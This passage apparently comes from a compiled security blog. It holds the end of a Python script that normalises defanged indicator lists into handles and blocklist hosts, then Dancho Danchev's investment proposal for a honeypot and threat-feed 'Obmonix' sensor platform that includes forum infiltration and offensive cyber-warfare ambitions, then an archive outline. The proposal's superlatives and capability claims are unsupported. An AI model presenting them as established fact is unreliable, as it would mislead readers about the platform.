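    url = re.sub(r"^hxxp", "http", raw, flags=re.IGNORECASE)  # undo defanging
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host in ("twitter.com", "www.twitter.com"):
        handle = parts.path.strip("/").split("/")[0]
        if HANDLE_RE.match(handle):
            return ("twitter", handle.lower())  # handles are case-insensitive
        return ("suspect", raw)
    if HOST_RE.match(host) and host.rsplit(".", 1)[-1] in KNOWN_TLDS:
        return ("host", host)  # path dropped: blocklists act on the host
    return ("suspect", raw)


def normalise(text):
    """Split a dump into unique handles, unique hosts and entries to review,
    preserving first-seen order."""
    handles, hosts, suspects = [], [], []
    seen = set()
    for line in text.splitlines():
        item = classify(line)
        if item is None:
            continue
        kind, value = item
        if kind == "suspect":
            suspects.append(value)
        elif (kind, value) not in seen:
            seen.add((kind, value))
            (handles if kind == "twitter" else hosts).append(value)
    return handles, hosts, suspects


if __name__ == "__main__":
    handles, hosts, suspects = normalise(SAMPLE_LINES)
    print("twitter handles:", handles)
    print("forum hosts:", hosts)
    print("needs review:", suspects)
```

Two design choices matter here. Forum entries are folded to the hostname, so `Alboraq.info/forum` and `alboraq.info` become one indicator; keep the path if the feed is for URL filtering rather than DNS or proxy blocking. And nothing is discarded: the four damaged sample lines come back as `suspects`, which is where the OCR-mangled handles in the list above will land when the full list is fed through.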

Detailed Project Funding Phase Information 

01. The initial stage of the project will consist of the selective and timely purchase of all the necessary appliances, including the timely localization and acquisition of fake Web site honeypot solutions and the acquisition of network assets for honeypot placement. 

• Associated deliverables will include access to proprietary technology, the ability to commit to long-term tasking, and the foundation for the Obmonix platform, including its eventual commercialization, further enhancing the operator's ability to continue providing the Intelligence Community with the data needed to proactively respond to a growing set of nation-state and malicious-actor cybercrime and cyber-jihad activity globally. 

02. The next stage will consist of the placement of the required equipment in a secure location, including the security measures needed to ensure that the Obmonix operator works from secure premises. 

• Associated deliverables will include a secure workplace and the ability to empower the operator with the data needed to perform operator activities, ensuring a global presence for Intelligence Community members and the security industry. 

03. The next stage will consist of the purchase of spam, phishing and malware feed access, including geolocated placement within specific regions of interest, including but not limited to Algeria, Argentina, Bahrain, Bolivia, Brazil, Burkina Faso, Chile, China, Colombia, Cyprus, Ecuador, Guatemala, Jordan, Democratic People's Republic of Korea, Liberia, Macao, Maldives, Moldova, Republic of Nauru, Niger, Pakistan, Poland, Romania, Sierra Leone, Sudan, Syrian Arab Republic, Togo, Uganda, Vanuatu, Yemen. 

• Associated deliverables will include access to the world's largest portfolio of threat intelligence data sets, including real-time data, empowering the operator with the data needed to perform operator activities. 

04. The next stage will include the acquisition of service-based localization and acquisition solutions, leading to a usable set of data collected and processed by the sensor. 

• Associated deliverables will include access to proprietary technology empowering the operator with the data needed to perform operator activities, including real-time monitoring of the world's largest and most comprehensive sensor-network-based cybercrime and cyber-jihad platform. 

05. The next phase will include data acquisition from the Intelligence Community's leading intelligence-gathering platform, in the form of active data placement and the establishment of a threat-intelligence-gathering portal. 

• Associated deliverables will include the world's largest data set of cybercrime and cyber-jihad activity from a sensor-based platform, eventually leading the Obmonix platform to a commercialization stage and further enhancing the Intelligence Community's and the security industry's mission. 

Detailed Project Cost Proposal Information 

The initial stage of the project will consist of the selective and timely purchase of all the necessary appliances, including the timely localization and acquisition of fake Web site honeypot solutions and the acquisition of network assets for honeypot placement. 

• FortiMail 

Key points: 

• The appliance is capable of processing millions of emails on a daily basis. 

• The appliance is capable of maintaining a list of thousands of fake email addresses, allowing additional attribution and potentially expanding its capabilities to include additional custom-made spam origin sources. 

• The appliance is capable of delivering actionable intelligence on millions of spam origin sources in Iran, Pakistan, Saudi Arabia, Iraq and Syria on a daily basis. 

• The appliance is capable of delivering detailed information leading to the production of actionable intelligence for Iran, Pakistan, Saudi Arabia, Iraq and Syria on a daily basis. 

The FortiMail appliance would ensure the active acquisition of spam, establishing the foundation for a research and monitoring system that allows the systematic, real-time and automated acquisition of malicious software, phishing and social engineering. 

• Blue Coat Malware Analysis 

Key points: 

• The appliance is capable of processing thousands of malware samples on a daily basis. 

• The appliance is capable of maintaining detailed information, processed and delivered in an automated fashion, on malicious sources originating in Iran, Pakistan, Saudi Arabia, Iraq and Syria. 

• The appliance is capable of interacting with Web links found in malicious spam emails, establishing the foundation for monitoring malicious software, phishing and social engineering originating from Iran, Pakistan, Saudi Arabia, Iraq and Syria, including the automated processing of and interaction with mobile malware. 

• The appliance is capable of maintaining detailed information leading to the production of quality, real-time, actionable intelligence reports on malicious software, phishing and social engineering origin sources in Iran, Pakistan, Saudi Arabia, Iraq and Syria. 

The Blue Coat Malware Analysis appliance would ensure the automated and real-time acquisition of malicious software, phishing and social engineering research data originating from these sources. 

• Vormetric encryption appliance 

Key points: 

• The encryption appliance would ensure the real-time storage of the research and analysis data, ensuring the availability, confidentiality and integrity of the data for the purpose of producing actionable, real-time intelligence reports. 

• The encryption appliance would ensure the real-time storage of the actionable, real-time delivered research and analysis data, allowing the research report data to be processed and analyzed efficiently, systematically and automatically. 

The encryption appliance would ensure that the platform operator is properly empowered with the necessary data, techniques and technologies to analyze, act upon and respond to cybercrime and cyber-jihad events globally. 

• Barracuda Web Application appliance 

Key points: 

• The Web application appliance would allow the automated, secure use of the robot system, allowing systematic, real-time data acquisition from various jihadist sources. 

• The Web application appliance would ensure the automated and efficient use of the robot in a secure fashion, allowing the production of real-time actionable intelligence and research and analysis data. 

The Web application appliance would ensure that the operator is properly empowered with the necessary data, techniques and technologies to analyze, act upon and respond to cybercrime and cyber-jihad events globally. 

• Checkpoint DDoS Protector 

Key points: 

• The appliance is capable of preventing exposure of the network assets utilized by the project, which could otherwise compromise the availability, confidentiality and integrity of the information. 

• The appliance is capable of ensuring the real-time, automated and persistent availability, integrity and confidentiality of the information. 

The Checkpoint DDoS Protector would ensure the constant availability of the network infrastructure utilized in this project, potentially preventing compromise of the network assets and resulting in improved productivity and realization of the project objectives. 

• Encryption appliance 

Key points: 

• The encryption appliance is capable of ensuring the confidentiality, integrity and availability of the information. 

• The encryption appliance is capable of distinguishing between multiple networks, further ensuring closed-network access. 

The encryption appliance would ensure that the maximum possible security measures are in place, ensuring that access to the closed, restricted network remains as private as possible and preserving the confidentiality, integrity and availability of the information in support of active, real-time, intelligence-based research and analysis data. 

• Cisco Catalyst 

Key points: 

• The appliance is capable of ensuring the real-time and automated use of the network equipment necessary to maintain the active infrastructure, ensuring that it operates in an automated and efficient fashion. 

Cisco Catalyst is network equipment allowing efficient interconnection between all the platforms and network equipment used in this project. 

• Kapow appliance 

Key points: 

• The appliance is capable of processing hundreds of thousands of Web sites on a daily basis, ensuring the automated processing and analysis of jihadist communities and allowing the monitoring process to be automated, further enhancing the produced actionable intelligence and research and analysis data. 

• The appliance is capable of monitoring and establishing the foundation for real-time monitoring and analysis of jihadist communities for the purpose of producing actionable, real-time intelligence and research and analysis data. 

• The appliance is capable of processing multiple jihadist forum communities for the purpose of establishing the foundation for real-time actionable intelligence and research and analysis data. 

The analysis appliance would ensure timely, real-time access to current and historical intelligence data on jihadist activities online, through the systematic, automated and real-time acquisition of data from a variety of public and closed sources, setting up the foundation for a data source that supports successful analysis and research activities. 

• Appliance router 

Key points: 

• The appliance router would ensure the constant, real-time availability of the network assets for the purpose of active and timely acquisition of actionable, real-time research and analysis report data. 

The purpose of the appliance router would be to ensure real-time connectivity with a variety of platforms, ensuring that the operator is properly empowered with the necessary data, techniques and technologies to analyze, act upon and respond to cybercrime and cyber-jihad events globally. 

• Analytics appliance 

Key points: 

• The analytics appliance would be capable of performing real-time assessment of cybercrime and cyber-jihad events globally, and will ultimately empower the Obmonix platform operator with the necessary data, information and knowledge to act upon, prevent and respond to cybercrime and cyber-jihad events globally. 

The purpose of the appliance would be to empower the operator with the necessary data, information and knowledge to act upon, react to and respond to various cybercrime and cyber-jihad events globally. 

• Rosette appliance 

Key points: 

• The localization appliance will ultimately empower the Obmonix platform operator with the necessary data, information and knowledge to act upon, respond to and prevent widespread damage while analyzing cybercrime and cyber-jihad events globally. 

The purpose of the localization appliance would be to empower the Obmonix platform operator with the necessary data, information and knowledge to act upon, respond to and prevent widespread damage provoked by cybercrime and cyber-jihad events globally. 

• Systran appliance 

Key points: 

• The Systran appliance will ultimately empower the operator with the necessary data, information and knowledge to act upon, respond to and prevent widespread damage while analyzing cybercrime and cyber-jihad events globally. 

The purpose of the Systran appliance would be to empower the Obmonix platform operator with the necessary data, information and knowledge to act upon, respond to and prevent widespread damage provoked by cybercrime and cyber-jihad events globally. 

Funding Phase 

The initial funding phase will consist of the acquisition of assets for the purpose of obtaining access to industry-leading and proprietary selected providers of threat intelligence, establishing the foundation for an active cybercrime/cyber-jihad monitoring sensor network. The initial stage will consist of obtaining assets for the purpose of obtaining access to industry-leading and proprietary selected equipment, setting the foundation for sensor-network-based data. 

The initial phase will consist of the purchase of the following equipment: FortiSandbox, Blue Coat Malware Analysis, NAS Storage, Cisco Firewall, pfSense, Cisco Catalyst, Vormetric encryption appliance, including the following subscription-based threat intelligence data feeds: Team Cymru threat data feed, Kaspersky threat data feed, Abusix threat data feed, MalwarePatrol threat data feed, Sophos threat data feed, OPSWAT, Abusix Threat Feed, Project Honeypot threat data feed. 

- Kaspersky Data Feed 

- Sophos Data Feed 

- Team Cymru Data Feed 

- MalwarePatrol Data Feed 

- Abusix Data Feed 

- LookingGlass Data Feed 

- Cyren Data Feed 

- Symantec Data Feed 

- VirusTotal Data Feed 

- Project Honeypot Data Feed 

The second funding phase will consist of the acquisition of honeypot appliances, including netblock purchases within a dedicated set of countries, for the purpose of establishing the foundation of an active sensor network for data acquisition. The second funding phase will consist of the acquisition of the following proprietary appliances: Honeybox Enterprise, Honeybox SCADA, including netblocks within the following countries. 

The third funding phase will consist of the purchase of service- and solution-based appliances, including data-processing and localization appliances, for the purpose of setting up the foundation for the Obmonix platform, empowering its operator with the necessary data and expertise for actively responding to global cybercrime and jihad events. 

The third funding phase will consist of the purchase of the following appliances: Kapow Software, Rosette appliance, Systran appliance, Sentinel appliance, Palantir appliance. 

The fourth funding phase will consist of the purchase of the World's most popular solution-oriented portal for Information Security - Expedited Entry Into the Cyber Warfare Realm - a Pro-U.S.-based Offensive and Asymmetric Cyber Warfare Practical Trends Application, Big Data and Research-Centered R&D Platform - further ensuring successful and ongoing commercialization, including the acquisition of a client base and the establishment of the World's largest endpoint-based sensor network for tracking and responding to cybercrime and jihad events globally. 

Dancho Danchev will build a pro-U.S. offensive and asymmetric cyber warfare program that will inevitably dive deep into the Cyber Warfare realm and will produce what can best be described as the U.S. primary source for offensive and asymmetric cyber warfare information: a repository of data and information on current and future trends, providing the foundation for a successful R&D cyber warfare partnership with millions of loyal Pro-Western cyber warriors and researchers globally, and positioning the platform as the leading think-tank for practical and relevant cyber warfare power, including the World's leading Pro-Western Cyber Warfare Research and Development program center. 

With the U.S. attempting to tackle the country's perceived and outdated misunderstanding of Cyber Warfare in today's modern, Russia-, China- and Iran-dominated Cyber Warfare realm, including the ongoing shortage of recruitment and a relatively outdated and not necessarily dynamic HR-management pool of hundreds of thousands of Pro-U.S. Cyber Warriors, the platform will ultimately empower and re-position the U.S. as the dominant Cyber Warfare power by providing actionable, think-tank-style, proactive Cyber Warfare insight, including the active and permanent recruitment of millions of Pro-U.S. Cyber Warriors, further supporting the U.S. mission to dominate and launch offensive and defensive cyber missions and related research attacks. 

The project will conduct what can best be described as the most comprehensive study and analysis of the United States' outdated understanding of the Cyber Warfare realm and provide actionable and practical insight, including a production-ready, HR-management- and Big Data-driven Cyber Warfare platform, disrupting international cybercrime networks conducting economic terrorism, infiltrating the vibrant international cybercrime and cyber-jihad community and recruiting millions of Pro-U.S. Cyber Warriors. The first stage of the project would ensure that the foundation for a successful invite-only Pro-U.S. Cyber Warfare community has already been established through the direct launch and operation of the World's Largest Proprietary Invite-Only Pro-U.S. Cyber Warfare Forum Community. 

Associated deliverables will include: the World's largest search engine for security information; the World's most vibrant community for security job search; the World's most vibrant proprietary community for sharing, disseminating, communicating and enriching security data; the World's most comprehensive sensor network for observing, disseminating and responding to global cybercrime events; the release of a community-enriched security router; the release of a community-enriched privacy router; the development and release of a community-enriched public threat feed; the release of a community-enriched private threat feed, including a proprietary threat feed; targeted threat intelligence on demand as a research and analysis solution; a proprietary bug bounty solution; hacking- and security-oriented online radio; a hacking- and security-oriented e-zine; a hacking- and security-oriented videocast; on-demand penetration testing and offensive team consulting; on-demand Web site monitoring for security events; OEM partnership capabilities; custom-built anti-virus scanner capabilities. 

Community Industry Reference 

The contractor, Dancho Danchev, is an internationally recognized cybercrime researcher, security blogger and threat intelligence analyst in the field of cybercrime research, having contributed to the overall demise of cybercrime internationally throughout the past decade and having pioneered a variety of threat intelligence gathering methodologies that led him to the successful pursuit of high-profile nation-state actors and malicious adversaries across the globe. The researcher has launched a new startup named Disruptive Individuals, aiming to disrupt and undermine the international cybercrime and cyber-jihad ecosystem globally. 

Statement of Work (SOW) 

01. Vendor contact - the initial stage of the project will consist of direct contact with industry-leading commercial security appliance providers, requesting pricing and shipping details, including a "point-of-contact". 

• Possible deliverables of the initial stage include industry-leading security appliances: FortiMail, Blue Coat Malware Analysis, FortiSandbox, Vormetric encryption appliance, Barracuda Web Application appliance, Checkpoint DDoS Protector, Ethernet encryptor, Cisco Catalyst, Kapow appliance, Palantir appliance, Cisco firewall appliance, Rosette appliance, Systran appliance, NAS appliance, pfSense appliance, Honeybox appliance, Honeybox SCADA appliance. 

02. Vendor netblock contact - the initial stage of the project will consist of direct contact with industry-leading providers of netblocks, requesting pricing information for specific pre-defined geolocated regions of interest. 

• Possible deliverables include netblocks in Algeria, Argentina, Bahrain, Bolivia, Brazil, Burkina Faso, Chile, China, Colombia, Cyprus, Ecuador, Guatemala, Jordan, Democratic People's Republic of Korea, Liberia, Macao, Maldives, Moldova, Republic of Nauru, Niger, Pakistan, Poland, Romania, Sierra Leone, Sudan, Syrian Arab Republic, Togo, Uganda, Vanuatu, Yemen. 

03. Vendor threat data contact - the initial stage of the project will consist of direct contact with an industry-leading, selected set of threat data providers, requesting pricing information and possible partnership opportunities. 

• Possible deliverables include Team Cymru threat data feed, Kaspersky threat data feed, Abusix threat data feed, MalwarePatrol threat data feed, Sophos threat data feed, OPSWAT, Abusix Threat Feed, Project Honeypot threat data feed. 

04. Secure location foundation - the initial stage of the project will consist of direct evaluation of the infrastructure required for the secure location, including direct contact with security vendors to ensure a secure location. 

• Possible deliverables include military-grade fence, surveillance, security guard. 

05. Vendor connection contact - the initial stage of the project will consist of direct contact with vendors to ensure that the infrastructure is properly secured, ensuring a timely and secure infrastructure. 

• Possible deliverables include a direct connection. 

06. Secure work environment - the initial stage of the project will consist of direct evaluation, including the direct purchase of a work terminal, to ensure a smooth and secure work environment. 

• Possible deliverables include RF shielding, SEL SP-157, FSPK-10, SEL SP-113 "Blockade". 

07. Secure work environment - the initial stage of the project will consist of direct evaluation, including the direct purchase of equipment related to the secure work environment, to ensure a smooth and secure work environment. 

• Possible deliverables include Cisco Firepower ASA, Checkpoint Threat appliance, Nova network appliance, Fortinet security appliance, Dell SOHO network security appliance. 

The contractor, Dancho Danchev, is one of the world's leading experts in the field of cybercrime research and threat intelligence gathering, having tracked, monitored and profiled high-profile nation-state and malicious-actor fraudulent activity over the past decade and having pioneered and established direct connections with some of the world's leading providers of threat intelligence. 

The contractor's initial goal for the Obmonix platform would be to build the world's largest and most comprehensive sensor network for monitoring, profiling and keeping track of nation-state and malicious-actor fraudulent and malicious activity. 

The project's main base would be located in a discreet location in Sofia, Bulgaria. The contractor would eventually ensure that active RF shielding and basic physical security measures are in place, including active surveillance, a military-grade fence and an associated security guard, for the purpose of establishing the foundation of a secure work environment. 

The Obmonix platform aims to build the World's most versatile and comprehensive sensor network for intercepting, monitoring and responding to cybercrime and cyber-jihad events, deploying a variety of proprietary sensor networks based on honeypot appliances and industry-wide partnerships, including proprietary cybercrime and cyber-jihad forum and community monitoring and infiltration campaigns, and positioning the platform as the leading indicator of cybercrime and cyber-jihad activity globally. 


Cost Proposal - Detailed Project Information 

01. Equipment cost - The Obmonix platform will ultimately rely on the following equipment for the purpose of establishing the foundation for the Obmonix platform. 

• FortiMail 

• FortiSandbox 

• Blue Coat Malware Analysis 

• Vormetric encryption appliance 

• Checkpoint DDoS Protector 

• Encryption appliance 

• Cisco Catalyst 

• Kapow appliance 

• Appliance router 

• Analytics appliance 

• Infoblox Trinzic 1420 

• Nova network security 

• Cisco firewall appliance 

• IllusionBlack Framework 

• Rosette appliance 

• Systran appliance 

• NAS appliance 

• pfSense 

• Honeybox appliance 

• Honeybox SCADA appliance 

• Network equipment 

Detailed Project Funding Phase Information 

01. The initial funding phase will consist of the acquisition of assets for the purpose of obtaining access to industry-leading and proprietary selected providers of threat intelligence, establishing the foundation for an active cybercrime/cyber-jihad monitoring sensor network. The initial stage will consist of obtaining assets for the purpose of obtaining access to industry-leading and proprietary selected equipment, setting the foundation for sensor-network-based data. 

• The initial phase will consist of the purchase of the following equipment: FortiSandbox, Blue Coat Malware Analysis, NAS Storage, Cisco Firewall, pfSense, Cisco Catalyst, Vormetric encryption appliance, including the following subscription-based threat intelligence data feeds: Team Cymru threat data feed, Kaspersky threat data feed, Abusix threat data feed, MalwarePatrol threat data feed, Sophos threat data feed, OPSWAT, Abusix Threat Feed, Project Honeypot threat data feed, including the following threat feeds: 

• Kaspersky Data Feed 

• Sophos Data Feed 

• Jigsaw Threat Data Feed 

• IBM X-Force Exchange 

• Team Cymru Data Feed 

• Proofpoint Threat Feed 

• NetSTAR Data Feed 

• RiskIQ Data Feed 

• ESET Data Feed 

• Pixalate Data Feed 

• MalwarePatrol Data Feed 

• Abusix Data Feed 

• Massive Data Feed 

• PhishLabs Data Feed 

• LookingGlass Data Feed 

• Blueliv Data Feed 

• Mnemonic Data Feed 

• Cyren Data Feed 

• ADMINUSLabs Data Feed 

• NSFOCUS Data Feed 

• Webroot Data Feed 

• Symantec Data Feed 

• VirusTotal Data Feed 

• Project Honeypot Data Feed 

02. The second funding phase will consist of the acquisition of honeypot appliances, including netblock purchases within a dedicated set of countries, for the purpose of establishing the foundation of an active sensor network for data acquisition. 

• The second funding phase will consist of the acquisition of the following proprietary appliances: Honeybox Enterprise, Infoblox Trinzic 1420, Honeybox SCADA, including netblocks within a dedicated set of countries - Algeria, Argentina, Bahrain, Bolivia, Brazil, Burkina Faso, Chile, China, Colombia, Cyprus, Ecuador, Guatemala, Jordan, Democratic People's Republic of Korea, Liberia, Macao, Maldives, Moldova, Republic of Nauru, Niger, Pakistan, Poland, Romania, Sierra Leone, Sudan, Syrian Arab Republic, Togo, Uganda, Vanuatu, Yemen. 

03. The third funding phase will consist of the purchase of service- and solution-based appliances, including data-processing and localization appliances, for the purpose of setting up the foundation for the Obmonix platform, empowering its operator with the necessary data and expertise for actively responding to global cybercrime and jihad events. 

• The third funding phase will consist of the purchase of the following appliances: Kapow Software, Rosette appliance, Systran appliance, Sentinel appliance, Palantir appliance. 

In case you're interested in working with me for the purpose of implementing this project, including a possible investor introduction, I can be reached at dancho.danchev@hush.com 

Document Outline 

2017 

o January 

■ Historical OSINT - Massive Black Hat SEO Campaign, Spotted in the Wild, Serves Scareware - Part Two (2017-01-05 10:22) 
■ Historical OSINT - Malicious Malvertising Campaign, Spotted at FoxNews, Serves Scareware (2017-01-05 11:19) 

o May 

■ Historical OSINT - Inside the 2007-2009 Series of Cyber Attacks Against Multiple International Embassies (2017-05-29 08:28) 
■ Historical OSINT - A Portfolio of Exploits Serving Domains (2017-05-29 09:04) 
■ Historical OSINT - A Portfolio of Fake/Rogue Video Codecs (2017-05-29 09:27) 
■ Historical OSINT - A Diversified Portfolio of Fake Security Software (2017-05-29 09:38) 
■ Historical OSINT - Google Sponsored Scareware Spotted in the Wild (2017-05-29 15:48) 
■ Historical OSINT - A Diversified Portfolio of Pharmaceutical Scams Spotted in the Wild (2017-05-29 16:04) 
■ Historical OSINT - Massive Black Hat SEO Campaign Spotted in the Wild (2017-05-29 19:28) 
■ Historical OSINT - Mac OS X PornTube Malware Serving Domains (2017-05-29 20:05) 

o November 

■ Book Proposal - Seeking Sponsorship - Publisher Contact (2017-11-15 14:23) 

2018 

o July 

■ Historical OSINT - Summarizing 2 Years of Webroot's Threat Blog Posts Research (2018-07-28 21:00) 

o September 

■ Introducing Threat Data - The World's Most Comprehensive Threats Database (2018-09-20 16:30) 

o October 

■ Historical OSINT - iPowerWeb Hacked, Hundreds of Web Sites Affected (2018-10-19 18:17) 
■ Historical OSINT - Gumblar Botnet Infects Thousands of Sites, Serves Adobe Flash Exploits (2018-10-19 22:46) 
■ Historical OSINT - A Diverse Portfolio of Fake Security Software (2018-10-20 20:22) 
■ Historical OSINT - Calling Zeus Home (2018-10-20 20:25) 
■ Historical OSINT - Chinese Government Sites Serving Malware (2018-10-20 20:28) 
■ Historical OSINT - Hundreds of Bogus Bebo Accounts Serving Malware (2018-10-20 20:29) 
■ Historical OSINT - PhishTube Twitter Broadcast Impersonated, Scareware Serving Twitter Accounts Circulating (2018-10-20 22:10) 
■ Historical OSINT - Massive Blackhat SEO Campaign Courtesy of the Koobface Gang Spotted in the Wild (2018-10-20 22:28) 
■ Historical OSINT - Latvian ISPs, Scareware, and the Koobface Gang Connection (2018-10-20 22:34) 
■ Historical OSINT - Massive Scareware Dropping Campaign Spotted in the Wild (2018-10-20 22:38) 
■ Historical OSINT - Malware Domains Impersonating Google (2018-10-20 22:51) 
■ Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild (2018-10-21 22:35) 
■ Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild - Part Two (2018-10-21 22:47) 
■ Historical OSINT - Rogue Scareware Dropping Campaign Spotted in the Wild Courtesy of the Koobface Gang (2018-10-21 23:02) 
■ Historical OSINT - Profiling a Portfolio of Active 419-Themed Scams (2018-10-21 23:08) 
■ Historical OSINT - Yet Another Massive Blackhat SEO Campaign Spotted in the Wild (2018-10-21 23:21) 
■ Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware (2018-10-21 23:37) 
■ Historical OSINT - Yet Another Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware (2018-10-21 23:47) 
■ Historical OSINT - Spamvertized Swine Flu Domains - Part Two (2018-10-21 23:50) 
■ Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware (2018-10-21 23:55) 
■ Historical OSINT - A Diversified Portfolio of Fake Security Software (2018-10-22 13:33) 
■ Historical OSINT - A Diversified Portfolio of Fake Security Software Spotted in the Wild (2018-10-22 13:40) 
■ Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild Serves Scareware (2018-10-22 14:05) 
■ Historical OSINT - Malicious Economies of Scale - The Emergence of Efficient Platforms for Exploitation - 2007 (2018-10-22 16:23) 
■ Pay-Per-Exploit Acquisition Vulnerability Programs - Pros and cons? (2018-10-22 17:47) 

o December 

■ Cyber Security Project Investment Proposal - DIA Needipedia - Fight Cybercrime and Cyber Jihad With Sensors - Grab Your Copy Today! (2018-12-16 13:52) 